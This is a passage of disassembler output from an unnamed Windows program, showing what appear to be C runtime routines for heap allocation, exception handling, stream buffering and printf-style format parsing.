loc_4063AE: ; CODE XREF: sub_4062F9+AA�j
cmp ebx, ecx
mov [ebp+arg_0], ebx
jb short loc_4063A5
loc_4063B5: ; CODE XREF: sub_4062F9+B0�j
cmp ebx, ecx
jnz short loc_4063CE
call sub_405E64
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jnz short loc_4063CE
loc_4063C7: ; CODE XREF: sub_4062F9+E7�j
xor eax, eax
jmp loc_4065D7
; ---------------------------------------------------------------------------
loc_4063CE: ; CODE XREF: sub_4062F9+A2�j
; sub_4062F9+BE�j ...
push ebx
call sub_405F14
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_4063C7
loc_4063E2: ; CODE XREF: sub_4062F9+68�j
; sub_4062F9+8C�j
mov ds:dword_434DE8, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_406409
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_406432
loc_406409: ; CODE XREF: sub_4062F9+FA�j
and [ebp+var_4], 0
mov edx, [eax+0C4h]
lea ecx, [eax+44h]
loc_406416: ; CODE XREF: sub_4062F9+134�j
mov edi, [ecx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_40642F
inc [ebp+var_4]
mov edx, [ecx+84h]
add ecx, 4
jmp short loc_406416
; ---------------------------------------------------------------------------
loc_40642F: ; CODE XREF: sub_4062F9+126�j
mov edx, [ebp+var_4]
loc_406432: ; CODE XREF: sub_4062F9+10E�j
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
xor edi, edi
and ecx, esi
jnz short loc_406460
mov ecx, [eax+edx*4+0C4h]
and ecx, [ebp+var_8]
push 20h
pop edi
jmp short loc_406460
; ---------------------------------------------------------------------------
loc_40645D: ; CODE XREF: sub_4062F9+169�j
add ecx, ecx
inc edi
loc_406460: ; CODE XREF: sub_4062F9+153�j
; sub_4062F9+162�j
test ecx, ecx
jge short loc_40645D
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+var_8], ecx
jle short loc_406481
push 3Fh
pop esi
loc_406481: ; CODE XREF: sub_4062F9+183�j
cmp esi, edi
jz loc_40658A
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_4064ED
cmp edi, 20h
mov ebx, 80000000h
jge short loc_4064C1
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_4064EA
mov ecx, [ebp+var_14]
mov ebx, [ebp+arg_0]
and [ebx], ecx
jmp short loc_4064ED
; ---------------------------------------------------------------------------
loc_4064C1: ; CODE XREF: sub_4062F9+1A0�j
lea ecx, [edi-20h]
shr ebx, cl
mov ecx, [ebp+var_4]
lea ecx, [eax+ecx*4+0C4h]
lea edi, [eax+edi+4]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_4064EA
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_4064ED
; ---------------------------------------------------------------------------
loc_4064EA: ; CODE XREF: sub_4062F9+1BC�j
; sub_4062F9+1E4�j
mov ebx, [ebp+arg_0]
loc_4064ED: ; CODE XREF: sub_4062F9+196�j
; sub_4062F9+1C6�j ...
cmp [ebp+var_8], 0
mov ecx, [edx+8]
mov edi, [edx+4]
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_406596
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [edx+8], ecx
mov [edx+4], edi
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_406587
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_0+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jge short loc_40655E
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_40654C
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_40654C: ; CODE XREF: sub_4062F9+246�j
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_406587
; ---------------------------------------------------------------------------
loc_40655E: ; CODE XREF: sub_4062F9+240�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_406571
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_406571: ; CODE XREF: sub_4062F9+269�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_406587: ; CODE XREF: sub_4062F9+22E�j
; sub_4062F9+263�j
mov ecx, [ebp+var_8]
loc_40658A: ; CODE XREF: sub_4062F9+18A�j
test ecx, ecx
jz short loc_406599
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_406599
; ---------------------------------------------------------------------------
loc_406596: ; CODE XREF: sub_4062F9+20A�j
mov ecx, [ebp+var_8]
loc_406599: ; CODE XREF: sub_4062F9+293�j
; sub_4062F9+29B�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_4065CF
cmp ebx, ds:dword_425F6C
jnz short loc_4065CF
mov ecx, [ebp+var_4]
cmp ecx, ds:dword_434DF0
jnz short loc_4065CF
and ds:dword_425F6C, 0
loc_4065CF: ; CODE XREF: sub_4062F9+2BA�j
; sub_4062F9+2C2�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_4065D7: ; CODE XREF: sub_4062F9+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_4062F9 endp
; [00000045 BYTES: COLLAPSED FUNCTION __SEH_prolog4. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __SEH_epilog4. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_406640 proc near ; DATA XREF: __SEH_prolog4�o
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 004086D1 SIZE 00000019 BYTES
sub esp, 14h
push ebx
mov ebx, [esp+18h+arg_4]
push ebp
push esi
mov esi, [ebx+8]
xor esi, ds:dword_423064
push edi
mov eax, [esi]
cmp eax, 0FFFFFFFEh
mov [esp+24h+var_11], 0
mov [esp+24h+var_C], 1
lea edi, [ebx+10h]
jz short loc_406678
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
loc_406678: ; CODE XREF: sub_406640+29�j
mov ecx, [esi+0Ch]
mov eax, [esi+8]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
mov eax, [esp+24h+arg_0]
test byte ptr [eax+4], 66h
jnz loc_4067B5
mov ebp, [ebx+0Ch]
cmp ebp, 0FFFFFFFEh
mov ecx, [esp+24h+arg_8]
lea edx, [esp+24h+var_8]
mov [esp+24h+var_8], eax
mov [esp+24h+var_4], ecx
mov [ebx-4], edx
jz short loc_40670F
loc_4066B1: ; CODE XREF: sub_406640+A2�j
lea eax, [ebp+ebp*2+0]
mov ecx, [esi+eax*4+14h]
test ecx, ecx
lea ebx, [esi+eax*4+10h]
mov eax, [ebx]
mov [esp+24h+var_10], eax
jz short loc_4066DD
mov edx, edi
call sub_4086BA
test eax, eax
mov [esp+24h+var_11], 1
jl short loc_40671B
jg short loc_406725
mov eax, [esp+24h+var_10]
loc_4066DD: ; CODE XREF: sub_406640+85�j
cmp eax, 0FFFFFFFEh
mov ebp, eax
jnz short loc_4066B1
cmp [esp+24h+var_11], 0
jz short loc_40670F
loc_4066EB: ; CODE XREF: sub_406640+E3�j
; sub_406640+191�j
mov eax, [esi]
cmp eax, 0FFFFFFFEh
jz short loc_4066FF
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
loc_4066FF: ; CODE XREF: sub_406640+B0�j
mov ecx, [esi+0Ch]
mov eax, [esi+8]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
loc_40670F: ; CODE XREF: sub_406640+6F�j
; sub_406640+A9�j ...
mov eax, [esp+24h+var_C]
pop edi
pop esi
pop ebp
pop ebx
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_40671B: ; CODE XREF: sub_406640+95�j
mov [esp+24h+var_C], 0
jmp short loc_4066EB
; ---------------------------------------------------------------------------
loc_406725: ; CODE XREF: sub_406640+97�j
mov ecx, [esp+24h+arg_0]
cmp dword ptr [ecx], 0E06D7363h
jnz short loc_40675B
cmp ds:off_41DC1C, 0
jz short loc_40675B
push offset off_41DC1C
call sub_40CC52
add esp, 4
test eax, eax
jz short loc_40675B
mov edx, [esp+24h+arg_0]
push 1
push edx
call ds:off_41DC1C
add esp, 8
loc_40675B: ; CODE XREF: sub_406640+EF�j
; sub_406640+F8�j ...
mov ecx, [esp+24h+arg_4]
call sub_4086EA
mov eax, [esp+24h+arg_4]
cmp [eax+0Ch], ebp
jz short loc_406780
push offset dword_423064
push edi
mov edx, ebp
mov ecx, eax
call sub_408704
mov eax, [esp+24h+arg_4]
loc_406780: ; CODE XREF: sub_406640+12B�j
mov ecx, [esp+24h+var_10]
mov [eax+0Ch], ecx
mov eax, [esi]
cmp eax, 0FFFFFFFEh
jz short loc_40679B
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
loc_40679B: ; CODE XREF: sub_406640+14C�j
mov ecx, [esi+0Ch]
mov edx, [esi+8]
add ecx, edi
xor ecx, [edx+edi]
call sub_402710
mov ecx, [ebx+8]
mov edx, edi
jmp loc_4086D1
; ---------------------------------------------------------------------------
loc_4067B5: ; CODE XREF: sub_406640+50�j
cmp dword ptr [ebx+0Ch], 0FFFFFFFEh
jz loc_40670F
push offset dword_423064
push edi
mov ecx, ebx
mov edx, 0FFFFFFFEh
call sub_408704
jmp loc_4066EB
sub_406640 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4067D6 proc near ; CODE XREF: sub_402AEE+9F�p
; sub_4030B5+6E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_4]
push esi
call sub_408A20
mov [ebp+arg_4], eax
mov eax, [esi+0Ch]
test al, 82h
pop ecx
jnz short loc_406806
call sub_4057D3
mov dword ptr [eax], 9
loc_4067FA: ; CODE XREF: sub_4067D6+3F�j
or dword ptr [esi+0Ch], 20h
or eax, 0FFFFFFFFh
jmp loc_406933
; ---------------------------------------------------------------------------
loc_406806: ; CODE XREF: sub_4067D6+17�j
test al, 40h
jz short loc_406817
call sub_4057D3
mov dword ptr [eax], 22h
jmp short loc_4067FA
; ---------------------------------------------------------------------------
loc_406817: ; CODE XREF: sub_4067D6+32�j
push ebx
xor ebx, ebx
test al, 1
jz short loc_406834
test al, 10h
mov [esi+4], ebx
jz loc_4068AE
mov ecx, [esi+8]
and eax, 0FFFFFFFEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_406834: ; CODE XREF: sub_4067D6+46�j
mov eax, [esi+0Ch]
and eax, 0FFFFFFEFh
or eax, 2
test ax, 10Ch
mov [esi+0Ch], eax
mov [esi+4], ebx
mov [ebp+var_4], ebx
jnz short loc_406878
call sub_408084
add eax, 20h
cmp esi, eax
jz short loc_406864
call sub_408084
add eax, 40h
cmp esi, eax
jnz short loc_406871
loc_406864: ; CODE XREF: sub_4067D6+80�j
push [ebp+arg_4]
call sub_40D540
test eax, eax
pop ecx
jnz short loc_406878
loc_406871: ; CODE XREF: sub_4067D6+8C�j
push esi
call sub_40D4FC
pop ecx
loc_406878: ; CODE XREF: sub_4067D6+74�j
; sub_4067D6+99�j
test word ptr [esi+0Ch], 108h
push edi
jz loc_406905
mov eax, [esi+8]
mov edi, [esi]
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
sub edi, eax
dec ecx
cmp edi, ebx
mov [esi+4], ecx
jle short loc_4068B9
push edi
push eax
push [ebp+arg_4]
call sub_40D420
add esp, 0Ch
mov [ebp+var_4], eax
jmp short loc_4068FB
; ---------------------------------------------------------------------------
loc_4068AE: ; CODE XREF: sub_4067D6+4D�j
or eax, 20h
mov [esi+0Ch], eax
or eax, 0FFFFFFFFh
jmp short loc_406932
; ---------------------------------------------------------------------------
loc_4068B9: ; CODE XREF: sub_4067D6+C4�j
mov ecx, [ebp+arg_4]
cmp ecx, 0FFFFFFFFh
jz short loc_4068DC
cmp ecx, 0FFFFFFFEh
jz short loc_4068DC
mov eax, ecx
and eax, 1Fh
imul eax, 28h
mov edx, ecx
sar edx, 5
add eax, ds:dword_433CA0[edx*4]
jmp short loc_4068E1
; ---------------------------------------------------------------------------
loc_4068DC: ; CODE XREF: sub_4067D6+E9�j
; sub_4067D6+EE�j
mov eax, offset dword_423BD0
loc_4068E1: ; CODE XREF: sub_4067D6+104�j
test byte ptr [eax+4], 20h
jz short loc_4068FB
push 2
push ebx
push ebx
push ecx
call sub_40CD41
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_406920
loc_4068FB: ; CODE XREF: sub_4067D6+D6�j
; sub_4067D6+10F�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_40691B
; ---------------------------------------------------------------------------
loc_406905: ; CODE XREF: sub_4067D6+A9�j
xor edi, edi
inc edi
push edi
lea eax, [ebp+arg_0]
push eax
push [ebp+arg_4]
call sub_40D420
add esp, 0Ch
mov [ebp+var_4], eax
loc_40691B: ; CODE XREF: sub_4067D6+12D�j
cmp [ebp+var_4], edi
jz short loc_406929
loc_406920: ; CODE XREF: sub_4067D6+123�j
or dword ptr [esi+0Ch], 20h
or eax, 0FFFFFFFFh
jmp short loc_406931
; ---------------------------------------------------------------------------
loc_406929: ; CODE XREF: sub_4067D6+148�j
mov eax, [ebp+arg_0]
and eax, 0FFh
loc_406931: ; CODE XREF: sub_4067D6+151�j
pop edi
loc_406932: ; CODE XREF: sub_4067D6+E1�j
pop ebx
loc_406933: ; CODE XREF: sub_4067D6+2B�j
pop esi
leave
retn
sub_4067D6 endp
; =============== S U B R O U T I N E =======================================
sub_406936 proc near ; CODE XREF: sub_406969+11�p
; sub_40698D+22�p ...
test byte ptr [ecx+0Ch], 40h
jz short loc_406942
cmp dword ptr [ecx+8], 0
jz short loc_406966
loc_406942: ; CODE XREF: sub_406936+4�j
dec dword ptr [ecx+4]
js short loc_406952
mov edx, [ecx]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_40695E
; ---------------------------------------------------------------------------
loc_406952: ; CODE XREF: sub_406936+F�j
movsx eax, al
push ecx
push eax
call sub_4067D6
pop ecx
pop ecx
loc_40695E: ; CODE XREF: sub_406936+1A�j
cmp eax, 0FFFFFFFFh
jnz short loc_406966
or [esi], eax
retn
; ---------------------------------------------------------------------------
loc_406966: ; CODE XREF: sub_406936+A�j
; sub_406936+2B�j
inc dword ptr [esi]
retn
sub_406936 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406969 proc near ; CODE XREF: sub_4069D7+853�p
; sub_4069D7+880�p ...
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp short loc_406984
; ---------------------------------------------------------------------------
loc_406971: ; CODE XREF: sub_406969+1F�j
mov ecx, [ebp+arg_8]
mov al, [ebp+arg_0]
dec [ebp+arg_4]
call sub_406936
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_40698A
loc_406984: ; CODE XREF: sub_406969+6�j
cmp [ebp+arg_4], 0
jg short loc_406971
loc_40698A: ; CODE XREF: sub_406969+19�j
pop esi
pop ebp
retn
sub_406969 endp
; =============== S U B R O U T I N E =======================================
sub_40698D proc near ; CODE XREF: sub_4069D7+867�p
; sub_4069D7+8CE�p ...
arg_0 = dword ptr 4
test byte ptr [edi+0Ch], 40h
push ebx
push esi
mov esi, eax
mov ebx, ecx
jz short loc_4069CD
cmp dword ptr [edi+8], 0
jnz short loc_4069CD
mov eax, [esp+8+arg_0]
add [esi], eax
jmp short loc_4069D4
; ---------------------------------------------------------------------------
loc_4069A7: ; CODE XREF: sub_40698D+45�j
mov al, [ebx]
dec [esp+8+arg_0]
mov ecx, edi
call sub_406936
inc ebx
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_4069CD
call sub_4057D3
cmp dword ptr [eax], 2Ah
jnz short loc_4069D4
mov ecx, edi
mov al, 3Fh
call sub_406936
loc_4069CD: ; CODE XREF: sub_40698D+A�j
; sub_40698D+10�j ...
cmp [esp+8+arg_0], 0
jg short loc_4069A7
loc_4069D4: ; CODE XREF: sub_40698D+18�j
; sub_40698D+35�j
pop esi
pop ebx
retn
sub_40698D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=1F8h
sub_4069D7 proc near ; CODE XREF: sub_402AEE+80�p
; sub_4030B5+53�p ...
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_260 = dword ptr -260h
var_25C = byte ptr -25Ch
var_254 = dword ptr -254h
var_250 = byte ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = byte ptr -230h
var_22F = byte ptr -22Fh
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_211 = byte ptr -211h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_D = byte ptr -0Dh
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
lea ebp, [esp-1F8h]
sub esp, 278h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+1F8h+var_4], eax
mov eax, [ebp+1F8h+arg_0]
push ebx
mov ebx, [ebp+1F8h+arg_4]
push esi
xor esi, esi
push edi
mov edi, [ebp+1F8h+arg_C]
push [ebp+1F8h+arg_8]
lea ecx, [ebp+1F8h+var_25C]
mov [ebp+1F8h+var_228], eax
mov [ebp+1F8h+var_224], edi
mov [ebp+1F8h+var_244], esi
mov [ebp+1F8h+var_210], esi
mov [ebp+1F8h+var_238], esi
mov [ebp+1F8h+var_218], esi
mov [ebp+1F8h+var_234], esi
mov [ebp+1F8h+var_248], esi
mov [ebp+1F8h+var_23C], esi
call sub_40271F
cmp [ebp+1F8h+var_228], esi
jnz short loc_406A64
loc_406A37: ; CODE XREF: sub_4069D7+E5�j
; sub_4069D7+138�j ...
call sub_4057D3
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
push esi
loc_406A47: ; CODE XREF: sub_4069D7+948�j
call sub_402F39
add esp, 14h
cmp [ebp+1F8h+var_250], 0
jz short loc_406A5C
mov eax, [ebp+1F8h+var_254]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_406A5C: ; CODE XREF: sub_4069D7+7C�j
or eax, 0FFFFFFFFh
jmp loc_407334
; ---------------------------------------------------------------------------
loc_406A64: ; CODE XREF: sub_4069D7+5E�j
mov eax, [ebp+1F8h+var_228]
test byte ptr [eax+0Ch], 40h
jnz loc_406B15
push eax
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_406AB3
push [ebp+1F8h+var_228]
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_406AB3
push [ebp+1F8h+var_228]
call sub_408A20
push [ebp+1F8h+var_228]
sar eax, 5
lea esi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [esi]
pop ecx
pop ecx
xor esi, esi
jmp short loc_406AB8
; ---------------------------------------------------------------------------
loc_406AB3: ; CODE XREF: sub_4069D7+A4�j
; sub_4069D7+B2�j
mov eax, offset dword_423BD0
loc_406AB8: ; CODE XREF: sub_4069D7+DA�j
test byte ptr [eax+24h], 7Fh
jnz loc_406A37
push [ebp+1F8h+var_228]
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_406B06
push [ebp+1F8h+var_228]
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_406B06
push [ebp+1F8h+var_228]
call sub_408A20
push [ebp+1F8h+var_228]
sar eax, 5
lea esi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [esi]
pop ecx
pop ecx
xor esi, esi
jmp short loc_406B0B
; ---------------------------------------------------------------------------
loc_406B06: ; CODE XREF: sub_4069D7+F7�j
; sub_4069D7+105�j
mov eax, offset dword_423BD0
loc_406B0B: ; CODE XREF: sub_4069D7+12D�j
test byte ptr [eax+24h], 80h
jnz loc_406A37
loc_406B15: ; CODE XREF: sub_4069D7+94�j
cmp ebx, esi
jz loc_406A37
mov dl, [ebx]
xor ecx, ecx
test dl, dl
mov [ebp+1F8h+var_22C], esi
mov [ebp+1F8h+var_220], esi
mov [ebp+1F8h+var_24C], esi
mov [ebp+1F8h+var_211], dl
jz loc_407324
loc_406B35: ; CODE XREF: sub_4069D7+931�j
inc ebx
cmp [ebp+1F8h+var_22C], 0
mov [ebp+1F8h+var_240], ebx
jl loc_407324
mov al, dl
sub al, 20h
cmp al, 58h
ja short loc_406B5C
movsx eax, dl
movzx eax, ds:byte_41D4D8[eax]
and eax, 0Fh
xor esi, esi
jmp short loc_406B60
; ---------------------------------------------------------------------------
loc_406B5C: ; CODE XREF: sub_4069D7+172�j
xor esi, esi
xor eax, eax
loc_406B60: ; CODE XREF: sub_4069D7+183�j
movsx eax, ds:byte_41D4F8[ecx+eax*8]
push 7
sar eax, 4
pop ecx
cmp eax, ecx ; switch 8 cases
mov [ebp+1F8h+var_26C], eax
ja loc_4072F4 ; default
jmp off_40734F[eax*4] ; switch jump
loc_406B80: ; DATA XREF: seg000:off_40734F�o
or [ebp+1F8h+var_218], 0FFFFFFFFh ; jumptable 00406B79 case 1
mov [ebp+1F8h+var_270], esi
mov [ebp+1F8h+var_248], esi
mov [ebp+1F8h+var_238], esi
mov [ebp+1F8h+var_234], esi
mov [ebp+1F8h+var_210], esi
mov [ebp+1F8h+var_23C], esi
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406B9B: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: seg000:off_40734F�o
movsx eax, dl ; jumptable 00406B79 case 2
sub eax, 20h
jz short loc_406BE1
sub eax, 3
jz short loc_406BD5
sub eax, 8
jz short loc_406BCC
dec eax
dec eax
jz short loc_406BC3
sub eax, 3
jnz loc_4072F4 ; default
or [ebp+1F8h+var_210], 8
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BC3: ; CODE XREF: sub_4069D7+1D8�j
or [ebp+1F8h+var_210], 4
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BCC: ; CODE XREF: sub_4069D7+1D4�j
or [ebp+1F8h+var_210], 1
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BD5: ; CODE XREF: sub_4069D7+1CF�j
or [ebp+1F8h+var_210], 80h
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BE1: ; CODE XREF: sub_4069D7+1CA�j
or [ebp+1F8h+var_210], 2
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BEA: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: seg000:off_40734F�o
cmp dl, 2Ah ; jumptable 00406B79 case 3
jnz short loc_406C0F
add edi, 4
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
cmp edi, esi
mov [ebp+1F8h+var_238], edi
jge loc_4072F4 ; default
or [ebp+1F8h+var_210], 4
neg [ebp+1F8h+var_238]
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C0F: ; CODE XREF: sub_4069D7+216�j
mov eax, [ebp+1F8h+var_238]
imul eax, 0Ah
movsx ecx, dl
lea eax, [eax+ecx-30h]
mov [ebp+1F8h+var_238], eax
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C24: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: seg000:off_40734F�o
mov [ebp+1F8h+var_218], esi ; jumptable 00406B79 case 4
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C2C: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: seg000:off_40734F�o
cmp dl, 2Ah ; jumptable 00406B79 case 5
jnz short loc_406C4E
add edi, 4
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
cmp edi, esi
mov [ebp+1F8h+var_218], edi
jge loc_4072F4 ; default
or [ebp+1F8h+var_218], 0FFFFFFFFh
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C4E: ; CODE XREF: sub_4069D7+258�j
mov eax, [ebp+1F8h+var_218]
imul eax, 0Ah
movsx ecx, dl
lea eax, [eax+ecx-30h]
mov [ebp+1F8h+var_218], eax
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C63: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: seg000:off_40734F�o
cmp dl, 49h ; jumptable 00406B79 case 6
jz short loc_406CAE
cmp dl, 68h
jz short loc_406CA5
cmp dl, 6Ch
jz short loc_406C87
cmp dl, 77h
jnz loc_4072F4 ; default
or [ebp+1F8h+var_210], 800h
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C87: ; CODE XREF: sub_4069D7+299�j
cmp byte ptr [ebx], 6Ch
jnz short loc_406C9C
inc ebx
or [ebp+1F8h+var_210], 1000h
mov [ebp+1F8h+var_240], ebx
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C9C: ; CODE XREF: sub_4069D7+2B3�j
or [ebp+1F8h+var_210], 10h
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406CA5: ; CODE XREF: sub_4069D7+294�j
or [ebp+1F8h+var_210], 20h
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406CAE: ; CODE XREF: sub_4069D7+28F�j
mov al, [ebx]
cmp al, 36h
jnz short loc_406CCB
cmp byte ptr [ebx+1], 34h
jnz short loc_406CCB
inc ebx
inc ebx
or [ebp+1F8h+var_210], 8000h
mov [ebp+1F8h+var_240], ebx
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406CCB: ; CODE XREF: sub_4069D7+2DB�j
; sub_4069D7+2E1�j
cmp al, 33h
jnz short loc_406CE6
cmp byte ptr [ebx+1], 32h
jnz short loc_406CE6
inc ebx
inc ebx
and [ebp+1F8h+var_210], 0FFFF7FFFh
mov [ebp+1F8h+var_240], ebx
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406CE6: ; CODE XREF: sub_4069D7+2F6�j
; sub_4069D7+2FC�j
cmp al, 64h
jz loc_4072F4 ; default
cmp al, 69h
jz loc_4072F4 ; default
cmp al, 6Fh
jz loc_4072F4 ; default
cmp al, 75h
jz loc_4072F4 ; default
cmp al, 78h
jz loc_4072F4 ; default
cmp al, 58h
jz loc_4072F4 ; default
mov [ebp+1F8h+var_26C], esi
loc_406D19: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: seg000:off_40734F�o
lea eax, [ebp+1F8h+var_25C] ; jumptable 00406B79 case 0
push eax
movzx eax, dl
push eax
mov [ebp+1F8h+var_23C], esi
call sub_40CA00
pop ecx
test eax, eax
mov al, [ebp+1F8h+var_211]
pop ecx
jz short loc_406D4B
mov ecx, [ebp+1F8h+var_228]
lea esi, [ebp+1F8h+var_22C]
call sub_406936
mov al, [ebx]
inc ebx
test al, al
mov [ebp+1F8h+var_240], ebx
jz loc_40730D
loc_406D4B: ; CODE XREF: sub_4069D7+359�j
mov ecx, [ebp+1F8h+var_228]
lea esi, [ebp+1F8h+var_22C]
call sub_406936
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406D5B: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: seg000:off_40734F�o
movsx eax, dl ; jumptable 00406B79 case 7
cmp eax, 64h
jg loc_406ED9
jz loc_406F58
cmp eax, 53h
jg loc_406E21
jz short loc_406DD2
sub eax, 41h
jz short loc_406D8D
dec eax
dec eax
jz short loc_406DC1
dec eax
dec eax
jz short loc_406D8D
dec eax
dec eax
jnz loc_4071DC
loc_406D8D: ; CODE XREF: sub_4069D7+3A4�j
; sub_4069D7+3AC�j
add dl, 20h
mov [ebp+1F8h+var_270], 1
